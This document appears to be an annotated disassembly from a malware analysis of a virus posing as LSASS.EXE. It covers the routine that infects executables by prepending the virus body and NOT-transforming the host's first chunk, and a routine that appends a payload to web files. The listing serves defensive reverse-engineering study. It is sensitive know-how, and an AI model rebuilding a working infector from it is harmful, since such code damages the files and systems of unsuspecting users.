0040646E |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose
00406474 |. 59 POP ECX
00406475 |. B3 01 MOV BL,1 ; already infected: the only path that returns 1; host left untouched
00406477 |. 59 POP ECX
00406478 |. EB 34 JMP SHORT LSASS.004064AE
0040647A |> 6A 00 PUSH 0 ; /whence = SEEK_SET
0040647C |. 6A 00 PUSH 0 ; |offset = 0
0040647E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |stream = host
00406481 |. FF15 44A34000 CALL DWORD PTR DS:[<&MSVCRT.fseek>] ; /fseek: rewind (effectively a no-op, the host was just opened and 00403088 only got the path)
00406487 |. 8B86 7C010000 MOV EAX,DWORD PTR DS:[ESI+17C] ; temp file path (per the analysis: system32\Com\~)
0040648D |. 68 D8DD4000 PUSH LSASS.0040DDD8 ; ASCII "wb"
00406492 |. 50 PUSH EAX
00406493 |. FFD7 CALL EDI ; fopen(temp, "wb"): creates/truncates the output image
00406495 |. 83C4 14 ADD ESP,14
00406498 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX ; [EBP-20] = FILE* of the temp file (slot reused; the body FILE* is already closed)
0040649B |. 85C0 TEST EAX,EAX
0040649D |. 75 22 JNZ SHORT LSASS.004064C1
0040649F |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block - common failure exit: free the work buffer
004064A5 |. 32DB XOR BL,BL ; |return value 0
004064A7 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
004064AD |. 59 POP ECX ; NOTE(review): reached from 0040649D, the host FILE* at [EBP-1C] is never fclose'd (handle leak)
004064AE |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF ; EH state = -1
004064B2 |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004064B5 |. E8 42200000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> ; ~CString(EBP-24)
004064BA |. 8AC3 MOV AL,BL ; AL = BL (1 = already infected, 0 = failure)
004064BC |. E9 E6010000 JMP LSASS.004066A7
004064C1 |> 50 PUSH EAX ; /stream = temp file
004064C2 |. 8B3D 48A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fwrite>] ; |EDI = fwrite from here on
004064C8 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |n = bytes of body read earlier (== [40D03C])
004064CB |. 6A 01 PUSH 1 ; |size = 1
004064CD |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |ptr = (patched) virus body
004064D3 |. FFD7 CALL EDI ; /fwrite: part 1, the virus body
004064D5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; stream = temp file
004064D8 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX ; [EBP-18] = bytes written so far
004064DB |. 8D45 CC LEA EAX,DWORD PTR SS:[EBP-34] ; &statbuf.st_size = the host's original size
004064DE |. 6A 04 PUSH 4 ; part 2: 4-byte host size
004064E0 |. 6A 01 PUSH 1
004064E2 |. 50 PUSH EAX
004064E3 |. FFD7 CALL EDI ; fwrite
004064E5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; stream = temp file
004064E8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064EB |. 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24] ; &CString object at EBP-24 (still empty)
004064EE |. 6A 04 PUSH 4 ; part 3: 4 bytes = the CString's internal buffer pointer, not its text
004064F0 |. 6A 01 PUSH 1
004064F2 |. 50 PUSH EAX
004064F3 |. FFD7 CALL EDI ; fwrite - NOTE(review): looks like a bug or an opaque 4-byte pad; confirm what the stub expects at this offset
004064F5 |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; stream = host
004064F8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX
004064FB |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1 ; first-chunk flag: only the first chunk of the host is transformed
004064FF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; n = one chunk = virus body size
00406505 |. 6A 01 PUSH 1
00406507 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; buf (the body is no longer needed, buffer is reused)
0040650D |. FFD3 CALL EBX ; fread: first chunk of the host
0040650F |. 83C4 40 ADD ESP,40 ; pops the three fwrite and one fread argument groups above
00406512 |> 85C0 /TEST EAX,EAX ; host copy loop: EAX = bytes in this chunk (fread result); 0 = host exhausted
00406514 |. 0F84 8B000000 |JE LSASS.004065A5
0040651A |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0 ; first chunk?
0040651E |. 74 59 |JE SHORT LSASS.00406579 ; no -> write it through unchanged
00406520 |. 8B0D 30D04000 |MOV ECX,DWORD PTR DS:[40D030] ; global start offset of pass A (set elsewhere; 0x21B per the trace annotation)
00406526 |. 83C1 09 |ADD ECX,9 ; i = start + 9 (0x224 in the trace)
00406529 |> 3B0D 3CD04000 |/CMP ECX,DWORD PTR DS:[40D03C] ; pass A bound is the body size, not this chunk's byte count
0040652F |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; save i
00406532 |. 73 16 ||JNB SHORT LSASS.0040654A ; loop while i < [40D03C] (unsigned)
00406534 |. 8B96 70010000 ||MOV EDX,DWORD PTR DS:[ESI+170] ; buffer base
0040653A |. 03CA ||ADD ECX,EDX
0040653C |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]
0040653E |. F6D2 ||NOT DL
00406540 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; buf[i] = ~buf[i]
00406542 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]
00406545 |. 83C1 0B ||ADD ECX,0B ; i += 11
00406548 |.^ EB DF |/JMP SHORT LSASS.00406529
0040654A |> 33C9 |XOR ECX,ECX ; pass B: i = 0
0040654C |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
00406552 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX
00406555 |. 76 1E |JBE SHORT LSASS.00406575 ; body size 0 -> nothing to do
00406557 |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170] ; buffer base
0040655D |. 03CA ||ADD ECX,EDX
0040655F |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]
00406561 |. F6D2 ||NOT DL
00406563 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; buf[i] = ~buf[i]; an even offset already hit by pass A is flipped back to its original value
00406565 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]
00406568 |. 41 ||INC ECX
00406569 |. 41 ||INC ECX ; i += 2 (even offsets only)
0040656A |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406570 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX
00406573 |.^ 72 E2 |/JB SHORT LSASS.00406557 ; loop while i < [40D03C] (unsigned); may run past the EAX valid bytes, harmless since only EAX bytes are written
00406575 |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0 ; clear first-chunk flag: every later chunk is copied verbatim
00406579 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20] ; stream = temp file
0040657C |. 50 |PUSH EAX ; n = bytes in this chunk
0040657D |. 6A 01 |PUSH 1
0040657F |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406585 |. FFD7 |CALL EDI ; fwrite: part 4, one host chunk
00406587 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C] ; stream = host
0040658A |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
0040658D |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
00406593 |. 6A 01 |PUSH 1
00406595 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040659B |. FFD3 |CALL EBX ; fread: next host chunk
0040659D |. 83C4 20 |ADD ESP,20
004065A0 |.^ E9 6DFFFFFF /JMP LSASS.00406512
004065A5 |> FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |/stream = host
004065A8 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; |/fclose
004065AE |. 8B86 78010000 MOV EAX,DWORD PTR DS:[ESI+178] ; | second path member; per the analysis also Com\LSASS.EXE
004065B4 |. C70424 E8D14000 MOV DWORD PTR SS:[ESP],LSASS.0040D1E8 ; |ASCII "rb" (overwrites the fclose argument slot)
004065BB |. 50 PUSH EAX ; |path
004065BC |. FF15 84A34000 CALL DWORD PTR DS:[<&MSVCRT.fopen>] ; /fopen
004065C2 |. 59 POP ECX
004065C3 |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; [EBP-1C] = FILE* of [ESI+178] (slot reused)
004065C6 |. 85C0 TEST EAX,EAX
004065C8 |. 59 POP ECX
004065C9 |. 0F84 BD000000 JE LSASS.0040668C ; open failed -> free, return 0 (temp file left open and half-written, see 00406698)
004065CF |. 50 PUSH EAX ; stream
004065D0 |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1 ; first-chunk flag again
004065D4 |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; n = one chunk
004065DA |. 6A 01 PUSH 1
004065DC |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170]
004065E2 |. FFD3 CALL EBX ; fread: first chunk of [ESI+178]
004065E4 |. 83C4 10 ADD ESP,10
004065E7 |> 85C0 /TEST EAX,EAX ; copy loop for part 5; EAX = bytes in this chunk
004065E9 |. 74 5E |JE SHORT LSASS.00406649
004065EB |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0
004065EF |. 74 2F |JE SHORT LSASS.00406620 ; not the first chunk -> copy verbatim
004065F1 |. 33C9 |XOR ECX,ECX ; pass B only (even offsets); there is no pass A for this part
004065F3 |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX
004065F9 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX
004065FC |. 76 1E |JBE SHORT LSASS.0040661C
004065FE |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170]
00406604 |. 03CA ||ADD ECX,EDX
00406606 |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]
00406608 |. F6D2 ||NOT DL
0040660A |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; buf[i] = ~buf[i]
0040660C |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]
0040660F |. 41 ||INC ECX
00406610 |. 41 ||INC ECX ; i += 2
00406611 |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]
00406617 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX
0040661A |.^ 72 E2 |/JB SHORT LSASS.004065FE ; loop while i < [40D03C]
0040661C |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0 ; only the first chunk is transformed
00406620 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20] ; stream = temp file
00406623 |. 50 |PUSH EAX
00406624 |. 6A 01 |PUSH 1
00406626 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
0040662C |. FFD7 |CALL EDI ; fwrite: part 5 chunk
0040662E |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]
00406631 |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX
00406634 |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]
0040663A |. 6A 01 |PUSH 1
0040663C |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]
00406642 |. FFD3 |CALL EBX ; fread: next chunk
00406644 |. 83C4 20 |ADD ESP,20
00406647 |.^ EB 9E /JMP SHORT LSASS.004065E7
00406649 |> FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; stream = temp file
0040664C |. 8B0D 3CD04000 MOV ECX,DWORD PTR DS:[40D03C] ; virus body size
00406652 |. 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]
00406655 |. 6A 04 PUSH 4 ; part 6: 4-byte trailer
00406657 |. 6A 01 PUSH 1
00406659 |. 50 PUSH EAX
0040665A |. 8908 MOV DWORD PTR DS:[EAX],ECX ; [ESI+64] = [40D03C]; the same 4 bytes are written as the trailer
0040665C |. FFD7 CALL EDI ; fwrite
0040665E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream = [ESI+178]
00406661 |. 8B3D 90A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fclose>] ; |EDI = fclose
00406667 |. FFD7 CALL EDI ; /fclose
00406669 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; stream = temp file
0040666C |. FFD7 CALL EDI ; fclose
0040666E |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block
00406674 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
0040667A |. 83C4 1C ADD ESP,1C
0040667D |. FF05 04F44000 INC DWORD PTR DS:[40F404] ; EXE infection counter (the directory walker compares it before/after recursing into an archive)
00406683 |. C686 B3010000 01 MOV BYTE PTR DS:[ESI+1B3],1 ; success flag for the caller
0040668A |. EB 0D JMP SHORT LSASS.00406699 ; NB: success still returns AL = 0
0040668C |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block - failure exit for host _stat failure, empty host, or [ESI+178] open failure
00406692 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free
00406698 |. 59 POP ECX ; NOTE(review): when reached from 004065C9 the temp FILE* at [EBP-20] is never closed
00406699 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF ; EH state = -1
0040669D |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]
004066A0 |. E8 571E0000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> ; ~CString(EBP-24)
004066A5 |. 32C0 XOR AL,AL ; return 0
004066A7 |> 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] ; saved SEH link
004066AA |. 5F POP EDI
004066AB |. 5E POP ESI
004066AC |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX ; unlink the SEH frame
004066B3 |. 5B POP EBX
004066B4 |. C9 LEAVE
004066B5 /. C3 RETN
3 web文件感染函数 (web file infection routine, 00402B97)
;-----------------------------------------------------------------------
; Web file infection routine  (thiscall, this = ESI, RETN 8)
; Arguments (both CString, passed by value - the callee destroys them at
; 00402CBD / 00402CC9):
;   [EBP+8] = path of the target file
;   [EBP+C] = marker/payload string: searched for in the file and, when
;             absent, appended verbatim at EOF
; Flow: ifstream(path) -> read line by line (getline, 0x400-byte buffer,
;       '\n' delimiter which is dropped) into CString EBP-10 -> close ->
;       CString::Find(payload); -1 -> open the file via the object at
;       this+1B8, seek to end, write payload (length from the CString
;       header at [-8]), close, INC [40F408] (web infection counter).
; No return value is set on purpose; the file is never rewritten, only
; appended to.
; NOTE(review): the "already infected" test is a plain case-sensitive
; substring search for the exact payload text.
;-----------------------------------------------------------------------
00402B97 /$ B8 41904000 MOV EAX,LSASS.00409041 ; EH registration record (web file infection routine entry)
00402B9C |. E8 5F5B0000 CALL <JMP.&MSVCRT._EH_prolog>
00402BA1 |. 81EC 60040000 SUB ESP,460 ; locals: ifstream at EBP-6C, CString at EBP-10, 0x400-byte line buffer at EBP-46C
00402BA7 |. 53 PUSH EBX
00402BA8 |. 56 PUSH ESI
00402BA9 |. 8BF1 MOV ESI,ECX ; ESI = this
00402BAB |. 6A 01 PUSH 1
00402BAD |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402BB0 |. 5B POP EBX ; EBX = 1 (reused as open mode, EH state and the eofbit mask below)
00402BB1 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX ; EH state = 1
00402BB4 |. E8 4F590000 CALL <JMP.&MFC42.#540_??0CString@@QAE@X> ; CString at EBP-10: accumulates the file text
00402BB9 |. A1 18A34000 MOV EAX,DWORD PTR DS:[<&MSVCIRT.?openpr> ; presumably filebuf::openprot (default protection), name truncated in the dump
00402BBE |. 53 PUSH EBX ; hidden "construct virtual bases" flag = 1 (ios is a virtual base of ifstream in MSVCIRT) - confirm
00402BBF |. 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]
00402BC2 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402BC6 |. FF30 PUSH DWORD PTR DS:[EAX] ; prot
00402BC8 |. 53 PUSH EBX ; mode = 1 (ios::in)
00402BC9 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; path (CString arg used as char*)
00402BCC |. FF15 14A34000 CALL DWORD PTR DS:[<&MSVCIRT.??0ifstrea>; MSVCIRT.??0ifstream@@QAE@PBDHH@Z: ifstream(path, ios::in, prot)
00402BD2 |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]
00402BD5 |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
00402BD9 |. 85C0 TEST EAX,EAX ; always non-null (address of a local): compiler-generated null check for the base-class cast
00402BDB |. 74 0A JE SHORT LSASS.00402BE7
00402BDD |. 8B45 94 MOV EAX,DWORD PTR SS:[EBP-6C] ; vbtable pointer
00402BE0 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4] ; displacement of the virtual base (ios)
00402BE3 |. 8D4405 94 LEA EAX,DWORD PTR SS:[EBP+EAX-6C] ; EAX = &ios sub-object
00402BE7 |> F640 08 06 TEST BYTE PTR DS:[EAX+8],6 ; ios state & (failbit|badbit); classic iostream bits 1=eof, 2=fail, 4=bad - confirm for MSVCIRT
00402BEB |. 0F85 A4000000 JNZ LSASS.00402C95 ; open failed -> done
00402BF1 |. 85C0 TEST EAX,EAX
00402BF3 |. 0F84 9C000000 JE LSASS.00402C95
00402BF9 |. 68 10F44000 PUSH LSASS.0040F410 ; global string used as the accumulator's initial value (contents not visible here)
00402BFE |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C01 |. E8 165A0000 CALL <JMP.&MFC42.#860_??4CString@@QAEAB> ; text = (char*)0040F410
00402C06 |> 8B45 94 /MOV EAX,DWORD PTR SS:[EBP-6C] ; read loop: re-locate the ios sub-object each iteration
00402C09 |. 8B40 04 |MOV EAX,DWORD PTR DS:[EAX+4]
00402C0C |. 845C05 9C |TEST BYTE PTR SS:[EBP+EAX-64],BL ; ios state & 1 (eofbit); [EBP-64] = ios+8
00402C10 |. 75 28 |JNZ SHORT LSASS.00402C3A ; eof -> stop. NOTE(review): failbit is never checked; a line of >= 0x400 bytes with no '\n' could stall this loop - TODO confirm MSVCIRT getline behaviour
00402C12 |. 6A 0A |PUSH 0A ; delim = '\n' (consumed, not stored)
00402C14 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C] ; line buffer
00402C1A |. 68 00040000 |PUSH 400 ; n = 0x400
00402C1F |. 50 |PUSH EAX
00402C20 |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
00402C23 |. FF15 10A34000 |CALL DWORD PTR DS:[<&MSVCIRT.?getline@>; MSVCIRT.?getline@istream@@QAEAAV1@PAEHD@Z: getline(buf, 0x400, '\n')
00402C29 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]
00402C2F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402C32 |. 50 |PUSH EAX
00402C33 |. E8 0E5A0000 |CALL <JMP.&MFC42.#941_??YCString@@QAEA> ; text += line (newlines are lost; text is only used for the search below)
00402C38 |.^ EB CC /JMP SHORT LSASS.00402C06
00402C3A |> 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]
00402C3D |. FF15 0CA34000 CALL DWORD PTR DS:[<&MSVCIRT.?close@ifs>; close the input stream (the dump's "ofstream" label on this import looks like a mislabel)
00402C43 |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; payload/marker (CString arg used as char*)
00402C46 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C49 |. E8 C2590000 CALL <JMP.&MFC42.#2764_?Find@CString@@Q> ; case-sensitive substring search
00402C4E |. 83F8 FF CMP EAX,-1
00402C51 |. 75 42 JNZ SHORT LSASS.00402C95 ; payload already present -> treated as already infected, done
00402C53 |. 8B86 B8010000 MOV EAX,DWORD PTR DS:[ESI+1B8] ; vtable of the file object embedded at this+1B8
00402C59 |. 81C6 B8010000 ADD ESI,1B8 ; ESI = &file object
00402C5F |. 6A 00 PUSH 0
00402C61 |. 53 PUSH EBX ; 1
00402C62 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; path
00402C65 |. 8BCE MOV ECX,ESI
00402C67 |. FF50 28 CALL DWORD PTR DS:[EAX+28] ; vcall +0x28: open(path, 1, 0) per the analysis (CFile-like; not verified here)
00402C6A |. 85C0 TEST EAX,EAX
00402C6C |. 74 27 JE SHORT LSASS.00402C95 ; open failed -> done
00402C6E |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C70 |. 6A 02 PUSH 2 ; from = 2 (end)
00402C72 |. 6A 00 PUSH 0 ; offset = 0
00402C74 |. 8BCE MOV ECX,ESI
00402C76 |. FF50 30 CALL DWORD PTR DS:[EAX+30] ; vcall +0x30: seek(0, end) - the payload is appended, nothing is overwritten
00402C79 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] ; payload char*
00402C7C |. 8B16 MOV EDX,DWORD PTR DS:[ESI]
00402C7E |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8] ; CString length (nDataLength sits at -8 in the MFC 4.2 CStringData header)
00402C81 |. 51 PUSH ECX ; count
00402C82 |. 50 PUSH EAX ; buffer
00402C83 |. 8BCE MOV ECX,ESI
00402C85 |. FF52 40 CALL DWORD PTR DS:[EDX+40] ; vcall +0x40: write(payload, len); no newline or separator is written first
00402C88 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C8A |. 8BCE MOV ECX,ESI
00402C8C |. FF50 54 CALL DWORD PTR DS:[EAX+54] ; vcall +0x54: close
00402C8F |. FF05 08F44000 INC DWORD PTR DS:[40F408] ; web infection counter (compared by the directory walker before/after recursing into an archive)
00402C95 |> 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60] ; common exit; both stream destructors are invoked with ECX = EBP-60 in this dump
00402C98 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402C9C |. FF15 08A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ifstrea>; MSVCIRT.??1ifstream@@UAE@XZ
00402CA2 |. 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00402CA5 |. FF15 04A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ios@@UA>; MSVCIRT.??1ios@@UAE@XZ (virtual base destroyed separately)
00402CAB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402CAE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL
00402CB1 |. E8 46580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; ~CString(text)
00402CB6 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0
00402CBA |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
00402CBD |. E8 3A580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; ~CString(path arg): callee destroys it, i.e. passed by value
00402CC2 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00402CC6 |. 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]
00402CC9 |. E8 2E580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; ~CString(payload arg)
00402CCE |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] ; saved SEH link
00402CD1 |. 5E POP ESI
00402CD2 |. 5B POP EBX
00402CD3 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX ; unlink the SEH frame
00402CDA |. C9 LEAVE
00402CDB /. C2 0800 RETN 8 ; callee cleans the two CString argument slots